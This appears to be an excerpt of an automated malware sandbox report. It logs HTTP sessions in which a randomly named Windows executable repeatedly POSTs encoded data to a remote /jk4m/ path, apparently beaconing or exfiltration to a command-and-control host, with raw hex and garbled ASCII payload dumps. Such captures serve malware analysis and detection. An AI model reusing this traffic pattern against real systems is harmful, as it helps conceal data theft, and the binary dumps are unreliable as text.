                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 6c 65 3d 39 58 50 70 5f 30 5f 68 55 72 46 34 35 58 26 34 4e 5a 70 62 3d 75 39 46 52 73 31 6c 2f 33 4e 37 57 56 48 45 74 6e 4a 67 4a 42 55 45 79 49 6c 39 6c 6f 59 74 62 2f 33 66 47 39 44 4e 6e 76 33 48 73 62 41 73 35 78 6d 46 63 55 4f 36 45 4d 39 52 52 49 31 6a 46 2f 71 30 48 56 78 62 63 4c 32 4d 6b 4d 4d 6d 76 63 57 35 59 55 4a 6b 6d 77 37 4c 72 73 71 63 2f 41 54 4a 73 30 2b 70 4a 56 36 52 64 4f 66 4f 38 41 47 49 44 57 7a 6b 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk="}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.449746162.241.2.9280792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:24.379448891 CEST785OUTPOST /jk4m/ HTTP/1.1
                                                            Host: www.vendasnaweb1.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.vendasnaweb1.com
                                                            Referer: http://www.vendasnaweb1.com/jk4m/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 34 78 32 78 70 75 4d 43 6c 66 63 72 64 70 4f 6f 4c 6b 4b 65 4b 32 52 78 7a 6c 6d 35 42 49 4f 6c 59 45 33 75 58 2f 70 73 4a 59 54 41 5a 6d 53 41 4d 42 6c 7a 48 31 41 6f 6d 32 35 48 2f 6b 46 4b 74 41 6a 35 65 4c 39 44 49 4b 66 62 71 71 42 50 39 33 2f 76 72 64 59 53 72 43 2b 42 72 63 44 68 74 63 6e 63 44 61 6e 49 39 70 69 77 4f 78 50 63 58 71 66 6e 79 47 48 72 58 42 64 47 69 69 73 78 71 37 31 76 76 4f 55 34 79 6d 6e 44 34 34 65 4d 64 69 2f 4a 67 5a 6b 2f 41 67 6f 44 78 68 6b 5a 7a 63 52 69 4f 33 59 5a 44 32 4e 43 4f 4e 68 6d 70 71 69 72 77 3d 3d
                                                            Data Ascii: 4NZpb=LWzjlNPDNkqeO4x2xpuMClfcrdpOoLkKeK2Rxzlm5BIOlYE3uX/psJYTAZmSAMBlzH1Aom25H/kFKtAj5eL9DIKfbqqBP93/vrdYSrC+BrcDhtcncDanI9piwOxPcXqfnyGHrXBdGiisxq71vvOU4ymnD44eMdi/JgZk/AgoDxhkZzcRiO3YZD2NCONhmpqirw==
                                                            Aug 28, 2024 14:03:25.070198059 CEST1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:03:24 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            Content-Length: 15931
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df [TRUNCATED]
                                                            Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD4HS]20$B'6bgvtr;*R&d&'P&|a>v:2ZuK)WE)I4<m'8MaiE:-jL:097pzeRD/RO-'3lE|fs=kswX}tsgr6Bg_a7YLzz7 [pN!Fmk&]~k;g}5kp/v?4M'k([ZfTH7{o@QFqGRZ'`Vv?8iKB,w`[N>o*j'M,$CcxsLXgCh:YXW0%_#p5a2iZ,pn?e{#J|U=<5hE8"WALMBp8qeazx_fuh/c[M3'Upj"hY}W1_<p84kv*jc
                                                            Aug 28, 2024 14:03:25.070369959 CEST1236INData Raw: c9 e2 5a b8 28 f4 30 b5 df 72 7e d9 8b f0 3b 1e f7 7e cb c7 10 8c 7f cb bb 41 c0 f1 7b ce 2e ca 48 6d 6f da e8 41 5a e3 8f af 3b e1 eb 87 b0 7c cc 36 ce bd da f6 53 09 b2 91 d0 f8 ec b3 d7 db cc fa f8 1d f5 03 fc 46 e7 17 1b e7 ee c6 f9 6c e3 0c
                                                            Data Ascii: Z(0r~;~A{.HmoAZ;|6SFl[W7"NAH{uW:Zh_ t[/>aa-WBYzL][0zHggeSQemd^4;gA#-3HHAztrdCF+w|*
                                                            Aug 28, 2024 14:03:25.070375919 CEST1236INData Raw: ad 75 bf c3 a1 48 6e 6d 03 5b 8a de d2 b9 a3 91 56 d6 19 86 6d 50 91 4c 23 63 a1 55 68 40 32 27 26 f0 08 cb 8c c5 a8 ae b0 6e 1f 53 c5 26 22 66 1e 92 b4 76 ab e6 c5 06 29 8a 94 da 70 c2 4c 9d 6e 14 2c 09 16 39 4d a1 90 18 93 8d c1 88 45 b7 71 b1
                                                            Data Ascii: uHnm[VmPL#cUh@2'&nS&"fv)pLn,9MEqB@6p,n?Q1>U-Mi{Ky.(zs=-OMumExx8gV):H_$s]lJj!'`V2)OI60}h
                                                            Aug 28, 2024 14:03:25.071247101 CEST1236INData Raw: ef 16 93 75 82 e0 d3 0a 5c c9 46 20 e7 07 53 84 ca 72 37 f7 7d 99 61 2a 02 c4 56 30 d8 9d e4 aa ef ff 95 1c 62 a3 a7 61 67 b0 b9 e6 60 79 33 e5 c2 36 54 ef 19 14 7a 29 c2 25 6e a0 d0 94 43 a4 0d 73 42 ab 30 57 16 dc 6b 91 66 da 38 a6 dc 0e c9 7d
                                                            Data Ascii: u\F Sr7}a*V0bag`y36Tz)%nCsB0Wkf8}SuaA&F5=F.c:u'4UTEw7k{+M31"{:s+n>$TXOeW6La%/^%68D0HJ
                                                            Aug 28, 2024 14:03:25.071254015 CEST1236INData Raw: 36 e1 27 41 70 11 8d d8 a0 fa 99 52 13 8f c2 a0 d9 e9 f6 9b 9d cb f3 7d 59 9c 99 5b 30 b4 13 78 b8 f3 11 eb 3c 9a b8 02 0e 2e 9a 9d f3 c7 f2 bb 05 f0 19 bb bc 78 34 71 09 7c 85 d8 bd b3 cd f4 d2 22 b4 d8 2a 1d eb 28 b7 61 37 bb 2b 33 4a f5 ec 4c
                                                            Data Ascii: 6'ApR}Y[0x<.x4q|"*(a7+3JLE0,x{6f[}.K3=?#u2wBshwV1Au0$i5rc@r`7hQt+>JsT*)c(ZFZ>Ca36v9|;~;~G:!e
                                                            Aug 28, 2024 14:03:25.072491884 CEST1236INData Raw: 08 4e 0d 70 cc 8b c6 5d e8 42 75 9e cc d1 39 3a b7 8b 02 6d 98 8a 4b 0e e7 57 fb c6 da aa 61 e9 08 8c 2f 89 46 fb 4b 44 9c 38 d4 00 fd 5e a8 82 e9 17 23 1e 8d ce 0e b1 7f 90 1e 04 3c b8 dc f6 c8 a6 28 4b b1 3d fb 4b e0 9d 71 74 08 7b 33 3b 38 bf
                                                            Data Ascii: Np]Bu9:mKWa/FKD8^#<(K=Kqt{3;8Yn2SFg3B+o7GZ9Ns8;$0W+IEH-yg>:;mq3KZYU;3q#V?ovniSw
                                                            Aug 28, 2024 14:03:25.072498083 CEST1236INData Raw: 27 25 84 75 33 09 94 c6 52 8f 98 44 04 ad 1c 28 47 ad f8 00 08 d4 45 88 41 65 e2 54 70 58 64 75 ba 97 3e 8d dc 87 d3 04 0c d4 47 9a cf 1a d8 20 65 26 16 2a 24 01 3e b5 10 c2 0a 07 74 24 75 74 6b f1 35 63 9c fb 6d 3b 8d 8c 27 cc d4 1f b4 f1 1c 71
                                                            Data Ascii: '%u3RD(GEAeTpXdu>G e&*$>t$utk5cm;'quNcithQf(ZAB"i1)b5\$1bD>'/iS^p[VW2\3T\[Rfhf:zEwmnLhn V7MU{K0.5@qa
                                                            Aug 28, 2024 14:03:25.073668957 CEST1236INData Raw: 6e 05 46 c6 24 d0 0c 1d 79 24 ce 2a bf 02 6b 22 70 6f d4 00 3f 12 6b 95 5f 81 25 f3 54 28 9d 2f 41 b5 61 2a 3e 76 d6 ca da c7 7b 30 b4 b9 79 5e 8b a2 b4 aa 83 88 13 87 eb 03 50 e5 42 8f 44 df 2a db ab f5 93 91 b7 cb f6 39 62 e9 be 63 25 7f 58 b4
                                                            Data Ascii: nF$y$*k"po?k_%T(/Aa*>v{0y^PBD*9bc%XSaf@"}'`nJ3#q.8{*ZEcg,;2}?-#t4*gJ\v]=B+fLc.lBcfd4>IP14tZTt+
                                                            Aug 28, 2024 14:03:25.073676109 CEST1236INData Raw: e6 b3 07 2c 22 c9 d2 ac 1e b4 2e 2f ce 70 e4 26 59 9e c8 17 a4 5e ef 4c a6 84 62 a8 8b 81 06 f9 1c 4f 67 fd 6e a3 49 3a 65 64 81 e3 66 12 81 94 36 c8 b9 0c 4d 41 c4 89 0b c9 79 10 1c 33 02 61 8b c7 50 69 57 df 5d 64 a3 d1 98 3b b8 73 94 43 a4 0d
                                                            Data Ascii: ,"./p&Y^LbOgnI:edf6MAy3aPiW]d;sCsB+O9b^,<(7R{FLFc#$0K.ncspxI1HMyLgzbm.M,D<e&4*I:3-3
                                                            Aug 28, 2024 14:03:25.075182915 CEST1236INData Raw: 8c 5e 4a 34 89 1c d6 12 e7 32 1b b6 db 2c 13 ad 69 4b 9b b8 5d 23 89 81 f1 fa 65 02 8a 33 ab d8 14 46 9d 56 a4 d3 36 fa f7 bd d5 0a 13 db 37 1b 48 df 70 e1 fe f6 f3 77 35 e2 66 19 0c 6b 2c cb a4 88 0a d2 6d 63 f9 17 77 a9 c4 27 e1 24 be fd fc f6
                                                            Data Ascii: ^J42,iK]#e3FV67Hpw5fk,mcw'$G`Vdr:b)B%F"\(7;z'ySaDqi9)ie:/?|FB-g>>;ZqAEuraMTGX"ssE6iu+qfi]
                                                            Aug 28, 2024 14:03:25.078080893 CEST1236INData Raw: d7 94 92 3f 6b 1d 4b 20 bf b0 98 fc c0 14 8b c1 90 ba d2 36 32 22 73 0d 42 e9 cd 1f 4e ae 97 f7 9b 6b 31 36 2c 05 82 e2 0c 6b 5e 18 8b ca 4c a7 d3 56 5c a0 38 16 a7 25 46 a1 90 b2 ad c4 a5 f2 8f 82 0f ff fc cb 0f f4 af fd 9f be fe b7 9f bf fe be
                                                            Data Ascii: ?kK 62"sBNk16,k^LV\8%FPXjd*KS1aHHfa"8Un$ro|REt$utkK5:H&f8C2)6::6V8Y:bQQqfXP1:we&pLZHNga7


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.449747162.241.2.9280792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:26.911576986 CEST805OUTPOST /jk4m/ HTTP/1.1
                                                            Host: www.vendasnaweb1.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.vendasnaweb1.com
                                                            Referer: http://www.vendasnaweb1.com/jk4m/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 59 42 32 39 71 47 4d 4a 6c 66 62 6e 39 70 4f 2f 62 6b 47 65 4b 36 52 78 33 38 2b 34 33 67 4f 6c 35 30 33 76 54 54 70 72 4a 59 54 59 70 6d 4f 50 73 42 51 7a 48 70 69 6f 69 32 35 48 2f 67 46 4b 73 77 6a 35 76 4c 79 44 59 4b 5a 51 4b 71 44 41 64 33 2f 76 72 64 59 53 72 58 54 42 6f 73 44 68 5a 59 6e 4f 33 4f 6b 57 74 70 6a 36 75 78 50 57 33 71 62 6e 79 48 69 72 54 68 6e 47 67 61 73 78 72 4c 31 76 37 36 58 32 79 6d 2b 4e 59 35 7a 4c 39 66 7a 46 43 4d 66 35 43 68 48 4c 51 5a 68 56 56 4e 4c 7a 2f 57 50 4c 44 53 2b 66 4a 45 56 72 71 58 72 77 78 46 37 45 42 46 6c 2b 58 44 77 4a 6a 37 45 47 4d 6b 58 51 6f 6f 3d
                                                            Data Ascii: 4NZpb=LWzjlNPDNkqeOYB29qGMJlfbn9pO/bkGeK6Rx38+43gOl503vTTprJYTYpmOPsBQzHpioi25H/gFKswj5vLyDYKZQKqDAd3/vrdYSrXTBosDhZYnO3OkWtpj6uxPW3qbnyHirThnGgasxrL1v76X2ym+NY5zL9fzFCMf5ChHLQZhVVNLz/WPLDS+fJEVrqXrwxF7EBFl+XDwJj7EGMkXQoo=
                                                            Aug 28, 2024 14:03:27.598881006 CEST1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:03:27 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            Content-Length: 15931
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df [TRUNCATED]
                                                            Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD4HS]20$B'6bgvtr;*R&d&'P&|a>v:2ZuK)WE)I4<m'8MaiE:-jL:097pzeRD/RO-'3lE|fs=kswX}tsgr6Bg_a7YLzz7 [pN!Fmk&]~k;g}5kp/v?4M'k([ZfTH7{o@QFqGRZ'`Vv?8iKB,w`[N>o*j'M,$CcxsLXgCh:YXW0%_#p5a2iZ,pn?e{#J|U=<5hE8"WALMBp8qeazx_fuh/c[M3'Upj"hY}W1_<p84kv*jc
                                                            Aug 28, 2024 14:03:27.599123001 CEST1236INData Raw: c9 e2 5a b8 28 f4 30 b5 df 72 7e d9 8b f0 3b 1e f7 7e cb c7 10 8c 7f cb bb 41 c0 f1 7b ce 2e ca 48 6d 6f da e8 41 5a e3 8f af 3b e1 eb 87 b0 7c cc 36 ce bd da f6 53 09 b2 91 d0 f8 ec b3 d7 db cc fa f8 1d f5 03 fc 46 e7 17 1b e7 ee c6 f9 6c e3 0c
                                                            Data Ascii: Z(0r~;~A{.HmoAZ;|6SFl[W7"NAH{uW:Zh_ t[/>aa-WBYzL][0zHggeSQemd^4;gA#-3HHAztrdCF+w|*
                                                            Aug 28, 2024 14:03:27.599134922 CEST448INData Raw: ad 75 bf c3 a1 48 6e 6d 03 5b 8a de d2 b9 a3 91 56 d6 19 86 6d 50 91 4c 23 63 a1 55 68 40 32 27 26 f0 08 cb 8c c5 a8 ae b0 6e 1f 53 c5 26 22 66 1e 92 b4 76 ab e6 c5 06 29 8a 94 da 70 c2 4c 9d 6e 14 2c 09 16 39 4d a1 90 18 93 8d c1 88 45 b7 71 b1
                                                            Data Ascii: uHnm[VmPL#cUh@2'&nS&"fv)pLn,9MEqB@6p,n?Q1>U-Mi{Ky.(zs=-OMumExx8gV):H_$s]lJj!'`V2)OI60}h
                                                            Aug 28, 2024 14:03:27.599647999 CEST1236INData Raw: 19 a5 99 01 0b 8e d2 48 4b 6d fc 1f e5 0c 76 a6 dd 26 89 72 63 b0 d3 1b ff d2 58 80 44 52 64 34 63 be 9f ff d6 4f 7f e8 74 5a 57 bd d6 f9 65 7f 72 d9 0a 7a 57 f2 ac 75 de eb d1 e2 8b 94 ba 9d 73 ff 2d 02 e7 c4 7f 12 4c eb 4f 3a ad 8b de c5 5f 3a
                                                            Data Ascii: HKmv&rcXDRd4cOtZWerzWus-LO:_:V.)./oNB_rQTOi]bUuE,+z"o~.gfB2:--?'K,D'8Gd&q?C2EZYL%DXx9
                                                            Aug 28, 2024 14:03:27.599659920 CEST1236INData Raw: 1e 6f 3b 96 9a b9 b0 c0 be 3f b9 6e 5b 37 93 70 73 72 5d fc 25 82 0f 4f 57 00 8a 4d 44 cc 9c 40 68 54 fb 16 85 f4 a2 d3 c8 da d3 9b 93 56 45 1a a9 0a 52 e1 20 7d f7 4e b2 11 c8 b9 9e 80 41 02 d3 82 4d 38 32 c0 6e e9 14 1d 75 ff 54 38 0e 36 32 22
                                                            Data Ascii: o;?n[7psr]%OWMD@hTVER }NAM82nuT862"96lVUPuZK.^[ZN>.ueCq@.ERcu);&sY?9y?-ai!<e*QC6"nS.$/i/vf3gEn!Is6x
                                                            Aug 28, 2024 14:03:27.600516081 CEST1236INData Raw: c4 ec b1 46 3c 2b 3e c0 7c 75 0a 3b 90 96 49 98 10 43 75 4e b7 75 de 3d 5b e6 29 6d 52 26 2b f3 26 cc d4 29 9d 66 94 66 06 2c 38 ba ce a2 8b ba 05 a3 24 8f e1 e9 10 be 6a 01 e0 e0 ce 51 26 45 ac 68 84 f3 83 99 af 23 61 19 d9 49 94 30 76 9b 69 fe
                                                            Data Ascii: F<+>|u;ICuNu=[)mR&+&)ff,8$jQ&Eh#aI0vidYEPuDl$Nj!rB96l*U-XEK[Aj:1K>uF#K;j3n`]w;No3-0zG9YhPz'kn6'1BzgAi
                                                            Aug 28, 2024 14:03:27.600528955 CEST1236INData Raw: 96 9b 4c 1e f4 4a b1 aa 6e 70 8e 13 9c 6f b0 47 96 67 c8 be ff a8 69 cb 6e 23 6d 38 b0 fc ee 91 4e 38 02 8e d5 39 3f 5b 9b 02 63 fd 33 fc df 20 67 cb e6 a8 52 d0 3c ef 1e ed 51 9e db db 23 46 ec 35 3b 9d ee 7a c4 ab ab e6 25 ca 7c d5 5d 77 3e 3f
                                                            Data Ascii: LJnpoGgin#m8N89?[c3 gR<Q#F5;z%|]w>?k^mZgL0x~{Fhv;/:~Y{{-^wz;Gmh~?@Kgnou6ps:mOqF'^w~yu<wNs9Gg1
                                                            Aug 28, 2024 14:03:27.601433992 CEST1236INData Raw: bc 16 69 a6 8d 63 6a d5 aa e8 bb fb ba 6f 29 ff 09 9a 54 c1 bf a8 34 55 0d fe 33 15 0a a7 09 18 a8 87 4a bb fa 5a ad c6 c6 bd 80 dc 0c 8c 73 29 1b 0d a4 73 47 a7 82 bb 24 24 13 66 ea 94 4e 33 8a a3 ce 24 50 1a 4b 3d 62 92 fa 5e 0e c9 53 2b 3e 40
                                                            Data Ascii: icjo)T4U3JZs)sG$$fN3$PK=b^S+>@cb$G1:#g-nr->Ew*6$v?o.&o3kFk\GnG,G6d,8Z>P:b5y,/01B7)+{#)p|(mR&
                                                            Aug 28, 2024 14:03:27.601447105 CEST1236INData Raw: 9e a7 c7 aa ba 02 79 22 26 82 53 03 fc 59 c8 ab ea 0a 64 99 a7 42 e9 7c d9 42 1b a6 e2 e7 a9 52 89 f4 78 47 96 8e 10 fc 05 1a 16 40 55 fd 44 9c 38 34 01 80 5a d8 e2 39 bd b6 40 f6 ee e8 23 fb 6c 83 ec 73 d9 d2 df cf 5b d5 43 88 bd b3 7c 5c 93 2d
                                                            Data Ascii: y"&SYdB|BRxG@UD84Z9@#ls[C|\-]dcZ#fuHV0,><CU`(<5SbYy*,?cp*p'b"8fL:e$0.66:W|>V\U<]F8qUFc(W\,X
                                                            Aug 28, 2024 14:03:27.601460934 CEST776INData Raw: b0 a5 4a 34 93 4c 28 f4 b8 71 92 6c 45 b7 80 42 a5 5d 7d 1b 2d 02 85 cb 6f 54 be 49 18 bb c6 ca bc 53 c1 5d 12 92 c0 1b 14 bf c1 d2 bf 45 da a3 b2 75 1f c8 b6 2c 2d 66 79 62 ed 93 c4 f2 dc 76 b4 1a 69 3e 2b 07 46 d1 1a 2f ad 5a 31 53 85 6c 41 29
                                                            Data Ascii: J4L(qlEB]}-oTIS]Eu,-fybvi>+F/Z1SlA)H}Y`&Jd;PYVSEnVce0vRfPEhlvv+)\Jb:'KFXe8KB=9#E(c"If:wCnX%cAjTt3q
                                                            Aug 28, 2024 14:03:27.606451988 CEST1236INData Raw: 07 74 12 87 3b 84 0c fc 4f a9 e4 da 8c 5e 4a 34 89 1c d6 12 e7 32 1b b6 db 2c 13 ad 69 4b 9b b8 5d 23 89 81 f1 fa 65 02 8a 33 ab d8 14 46 9d 56 a4 d3 36 fa f7 bd d5 0a 13 db 37 1b 48 df 70 e1 fe f6 f3 77 35 e2 66 19 0c 6b 2c cb a4 88 0a d2 6d 63
                                                            Data Ascii: t;O^J42,iK]#e3FV67Hpw5fk,mcw'$G`Vdr:b)B%F"\(7;z'ySaDqi9)ie:/?|FB-g>>;ZqAEuraMTGX"ssE6iu+


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.449748162.241.2.9280792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:29.447824955 CEST10887OUTPOST /jk4m/ HTTP/1.1
                                                            Host: www.vendasnaweb1.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.vendasnaweb1.com
                                                            Referer: http://www.vendasnaweb1.com/jk4m/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 59 42 32 39 71 47 4d 4a 6c 66 62 6e 39 70 4f 2f 62 6b 47 65 4b 36 52 78 33 38 2b 34 33 6f 4f 6b 4c 38 33 75 79 54 70 71 4a 59 54 47 5a 6d 65 50 73 42 33 7a 48 78 6d 6f 69 79 48 48 38 49 46 4d 4b 4d 6a 2f 64 6a 79 4e 59 4b 5a 66 71 71 47 50 39 33 75 76 72 74 45 53 72 48 54 42 6f 73 44 68 59 6f 6e 4e 6a 61 6b 52 64 70 69 77 4f 78 39 63 58 71 2f 6e 78 32 66 72 54 6c 33 47 7a 53 73 2f 72 62 31 74 49 53 58 36 79 6d 38 4b 59 35 72 4c 39 53 78 46 43 52 6b 35 44 45 61 4c 51 39 68 56 52 77 30 6c 37 43 48 66 52 6d 64 42 49 30 42 72 71 7a 39 2b 47 77 41 53 51 6b 77 73 6e 54 42 4c 52 61 79 58 4f 64 52 50 65 47 71 35 42 50 41 6b 50 67 6a 53 4d 61 78 76 6c 30 4d 38 50 77 35 56 75 75 5a 42 47 48 6f 45 37 68 43 57 6c 47 43 46 35 4d 71 32 45 6d 43 2b 43 4d 6f 63 4c 74 4f 6e 48 53 2b 4c 37 38 55 6d 4b 6a 53 70 30 50 69 46 4c 44 46 68 62 58 72 45 59 34 65 57 72 75 4c 58 6a 57 53 74 2b 4f 54 48 56 5a 62 6e 57 4d 4a 6f 70 30 46 64 53 38 4a 35 58 77 4b 32 38 7a 4f [TRUNCATED]
